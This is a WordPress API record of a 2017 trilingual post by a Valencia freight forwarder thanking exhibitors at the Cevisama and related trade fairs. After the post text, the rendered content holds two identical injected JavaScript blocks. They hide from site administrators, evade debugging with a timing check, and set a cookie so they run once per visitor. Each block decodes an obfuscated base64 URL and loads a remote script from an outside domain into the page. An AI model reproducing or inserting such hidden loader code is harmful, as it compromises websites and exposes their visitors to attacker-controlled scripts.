{"id":1189,"date":"2017-02-27T12:25:25","date_gmt":"2017-02-27T10:25:25","guid":{"rendered":"http:\/\/www.weservices.es\/?p=1189"},"modified":"2026-04-27T10:17:23","modified_gmt":"2026-04-27T10:17:23","slug":"cevisama-2017-tradicion-valenciana","status":"publish","type":"post","link":"https:\/\/weservices.es\/en\/cevisama-2017-tradicion-valenciana\/","title":{"rendered":"[:es]CEVISAMA 2017, TRADICI\u00d3N VALENCIANA[:en]CEVISAMA 2017,VALENCIAN TRADITION[:ca]CEVISAMA 2017, TRADICI\u00d3 VALENCIANA[:]"},"content":{"rendered":"<p>[:es]<\/p>\n<p style=\"text-align: justify;\">WE Services sigue su singladura como Agente Oficial en Feria de Valencia. Es un orgullo seguir manteniendo el list\u00f3n tan alto en nuestros servicios y dedicaci\u00f3n, siempre al m\u00e1ximo, ofreciendo soluciones a cualquier dilema, en cualquier situaci\u00f3n, dentro de esta feria con tantos a\u00f1os de tradici\u00f3n en la ciudad.<\/p>\n<p style=\"text-align: justify;\">Un a\u00f1o m\u00e1s, gracias a todos por la confianza, <span class=\"\">Expositores de Cevisama&#8217;17, Fipa&#8217;17, Promat&#8217;17 y Sici&#8217;17.<\/span><\/p>\n<p>[:en]<\/p>\n<p style=\"text-align: justify;\"><span id=\"result_box\" class=\"\" lang=\"en\">WE Services continues our path as Official Freight Forwarder in Feria de Valencia<span class=\"\">. We&#8217;re so proud to continue keeping the bar so high in our services and dedication, always to the highest level, offering solutions to any dilemma, in any situation, within this event with so many years of tradition in the city.<br \/>\n<\/span><\/span><\/p>\n<p><span class=\"\">For another year, thank you all for trusting us, exhibtiors of Cevisama&#8217;17, Fipa&#8217;17, Promat&#8217;17 y Sici&#8217;17<br \/>\n<\/span>[:ca]<\/p>\n<p style=\"text-align: justify;\"><span id=\"result_box\" class=\"\" lang=\"ca\">WE Services segueix la seva singladura com Agent Oficial a Fira de Val\u00e8ncia. \u00c9s un orgull seguir mantenint el llist\u00f3 tan alt en els nostres serveis i dedicaci\u00f3, sempre al m\u00e0xim, oferint solucions a <span class=\"\">qualsevol<\/span> dilema, en qualsevol situaci\u00f3, dins aquesta fira amb tant anys de tradici\u00f3 a la ciutat.<br \/>\n<\/span><\/p>\n<p>Un any m\u00e9s, gr\u00e0cies a tots per <span class=\"\">la confian\u00e7a, expositore de Cevisama&#8217;17, Fipa&#8217;17, Promat&#8217;17 y Sici&#8217;17.<br \/>\n<\/span>[:]<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>[:es] WE Services sigue su singladura como Agente Oficial en Feria de Valencia. Es un orgullo seguir manteniendo el list\u00f3n tan alto en nuestros servicios y dedicaci\u00f3n, siempre al m\u00e1ximo, ofreciendo soluciones a cualquier dilema, en cualquier situaci\u00f3n, dentro de esta feria con tantos a\u00f1os de tradici\u00f3n en la ciudad. Un a\u00f1o m\u00e1s, gracias a [&hellip;]<\/p>","protected":false},"author":2,"featured_media":1190,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v22.3 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>[:es]CEVISAMA 2017, TRADICI\u00d3N VALENCIANA[:en]CEVISAMA 2017,VALENCIAN TRADITION[:ca]CEVISAMA 2017, TRADICI\u00d3 VALENCIANA[:] - We Services<\/title>\n<meta name=\"description\" content=\"WE Services sigue su singladura como Agente Oficial en Feria de Valencia. Es un orgullo seguir manteniendo el list\u00f3n tan alto en nuestros servicios y\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/weservices.es\/en\/cevisama-2017-tradicion-valenciana\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"[:es]CEVISAMA 2017, TRADICI\u00d3N VALENCIANA[:en]CEVISAMA 2017,VALENCIAN TRADITION[:ca]CEVISAMA 2017, TRADICI\u00d3 VALENCIANA[:] - We Services\" \/>\n<meta property=\"og:description\" content=\"WE Services sigue su singladura como Agente Oficial en Feria de Valencia. Es un orgullo seguir manteniendo el list\u00f3n tan alto en nuestros servicios y\" \/>\n<meta property=\"og:url\" content=\"https:\/\/weservices.es\/en\/cevisama-2017-tradicion-valenciana\/\" \/>\n<meta property=\"og:site_name\" content=\"We Services\" \/>\n<meta property=\"article:published_time\" content=\"2017-02-27T10:25:25+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-04-27T10:17:23+00:00\" \/>\n<meta name=\"author\" content=\"JOSE ANTONIO GARCIA SANCHEZ\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"JOSE ANTONIO GARCIA SANCHEZ\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/weservices.es\/cevisama-2017-tradicion-valenciana\/\",\"url\":\"https:\/\/weservices.es\/cevisama-2017-tradicion-valenciana\/\",\"name\":\"[:es]CEVISAMA 2017, TRADICI\u00d3N VALENCIANA[:en]CEVISAMA 2017,VALENCIAN TRADITION[:ca]CEVISAMA 2017, TRADICI\u00d3 VALENCIANA[:] - We Services\",\"isPartOf\":{\"@id\":\"https:\/\/weservices.es\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/weservices.es\/cevisama-2017-tradicion-valenciana\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/weservices.es\/cevisama-2017-tradicion-valenciana\/#primaryimage\"},\"thumbnailUrl\":\"\",\"datePublished\":\"2017-02-27T10:25:25+00:00\",\"dateModified\":\"2026-04-27T10:17:23+00:00\",\"author\":{\"@id\":\"https:\/\/weservices.es\/#\/schema\/person\/af068a5b48ce3b53d759cef6930c673b\"},\"description\":\"WE Services sigue su singladura como Agente Oficial en Feria de Valencia. Es un orgullo seguir manteniendo el list\u00f3n tan alto en nuestros servicios y\",\"breadcrumb\":{\"@id\":\"https:\/\/weservices.es\/cevisama-2017-tradicion-valenciana\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/weservices.es\/cevisama-2017-tradicion-valenciana\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/weservices.es\/cevisama-2017-tradicion-valenciana\/#primaryimage\",\"url\":\"\",\"contentUrl\":\"\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/weservices.es\/cevisama-2017-tradicion-valenciana\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\/\/weservices.es\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"[:es]CEVISAMA 2017, TRADICI\u00d3N VALENCIANA[:en]CEVISAMA 2017,VALENCIAN TRADITION[:ca]CEVISAMA 2017, TRADICI\u00d3 VALENCIANA[:]\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/weservices.es\/#website\",\"url\":\"https:\/\/weservices.es\/\",\"name\":\"We Services\",\"description\":\"Transport for fairs and events\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/weservices.es\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/weservices.es\/#\/schema\/person\/af068a5b48ce3b53d759cef6930c673b\",\"name\":\"JOSE ANTONIO GARCIA SANCHEZ\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/weservices.es\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/caf6e28e6b0db890830baec9989dbcd3?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/caf6e28e6b0db890830baec9989dbcd3?s=96&d=mm&r=g\",\"caption\":\"JOSE ANTONIO GARCIA SANCHEZ\"},\"url\":\"https:\/\/weservices.es\/en\/author\/jo\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"[:es]CEVISAMA 2017, TRADICI\u00d3N VALENCIANA[:en]CEVISAMA 2017,VALENCIAN TRADITION[:ca]CEVISAMA 2017, TRADICI\u00d3 VALENCIANA[:] - We Services","description":"WE Services sigue su singladura como Agente Oficial en Feria de Valencia. Es un orgullo seguir manteniendo el list\u00f3n tan alto en nuestros servicios y","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/weservices.es\/en\/cevisama-2017-tradicion-valenciana\/","og_locale":"en_US","og_type":"article","og_title":"[:es]CEVISAMA 2017, TRADICI\u00d3N VALENCIANA[:en]CEVISAMA 2017,VALENCIAN TRADITION[:ca]CEVISAMA 2017, TRADICI\u00d3 VALENCIANA[:] - We Services","og_description":"WE Services sigue su singladura como Agente Oficial en Feria de Valencia. Es un orgullo seguir manteniendo el list\u00f3n tan alto en nuestros servicios y","og_url":"https:\/\/weservices.es\/en\/cevisama-2017-tradicion-valenciana\/","og_site_name":"We Services","article_published_time":"2017-02-27T10:25:25+00:00","article_modified_time":"2026-04-27T10:17:23+00:00","author":"JOSE ANTONIO GARCIA SANCHEZ","twitter_card":"summary_large_image","twitter_misc":{"Written by":"JOSE ANTONIO GARCIA SANCHEZ","Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/weservices.es\/cevisama-2017-tradicion-valenciana\/","url":"https:\/\/weservices.es\/cevisama-2017-tradicion-valenciana\/","name":"[:es]CEVISAMA 2017, TRADICI\u00d3N VALENCIANA[:en]CEVISAMA 2017,VALENCIAN TRADITION[:ca]CEVISAMA 2017, TRADICI\u00d3 VALENCIANA[:] - We Services","isPartOf":{"@id":"https:\/\/weservices.es\/#website"},"primaryImageOfPage":{"@id":"https:\/\/weservices.es\/cevisama-2017-tradicion-valenciana\/#primaryimage"},"image":{"@id":"https:\/\/weservices.es\/cevisama-2017-tradicion-valenciana\/#primaryimage"},"thumbnailUrl":"","datePublished":"2017-02-27T10:25:25+00:00","dateModified":"2026-04-27T10:17:23+00:00","author":{"@id":"https:\/\/weservices.es\/#\/schema\/person\/af068a5b48ce3b53d759cef6930c673b"},"description":"WE Services sigue su singladura como Agente Oficial en Feria de Valencia. Es un orgullo seguir manteniendo el list\u00f3n tan alto en nuestros servicios y","breadcrumb":{"@id":"https:\/\/weservices.es\/cevisama-2017-tradicion-valenciana\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/weservices.es\/cevisama-2017-tradicion-valenciana\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/weservices.es\/cevisama-2017-tradicion-valenciana\/#primaryimage","url":"","contentUrl":""},{"@type":"BreadcrumbList","@id":"https:\/\/weservices.es\/cevisama-2017-tradicion-valenciana\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/weservices.es\/"},{"@type":"ListItem","position":2,"name":"[:es]CEVISAMA 2017, TRADICI\u00d3N VALENCIANA[:en]CEVISAMA 2017,VALENCIAN TRADITION[:ca]CEVISAMA 2017, TRADICI\u00d3 VALENCIANA[:]"}]},{"@type":"WebSite","@id":"https:\/\/weservices.es\/#website","url":"https:\/\/weservices.es\/","name":"We Services","description":"Transport for fairs and events","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/weservices.es\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/weservices.es\/#\/schema\/person\/af068a5b48ce3b53d759cef6930c673b","name":"JOSE ANTONIO GARCIA SANCHEZ","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/weservices.es\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/caf6e28e6b0db890830baec9989dbcd3?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/caf6e28e6b0db890830baec9989dbcd3?s=96&d=mm&r=g","caption":"JOSE ANTONIO GARCIA SANCHEZ"},"url":"https:\/\/weservices.es\/en\/author\/jo\/"}]}},"_links":{"self":[{"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/posts\/1189"}],"collection":[{"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/comments?post=1189"}],"version-history":[{"count":2,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/posts\/1189\/revisions"}],"predecessor-version":[{"id":3182,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/posts\/1189\/revisions\/3182"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/media?parent=1189"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/categories?post=1189"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/tags?post=1189"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}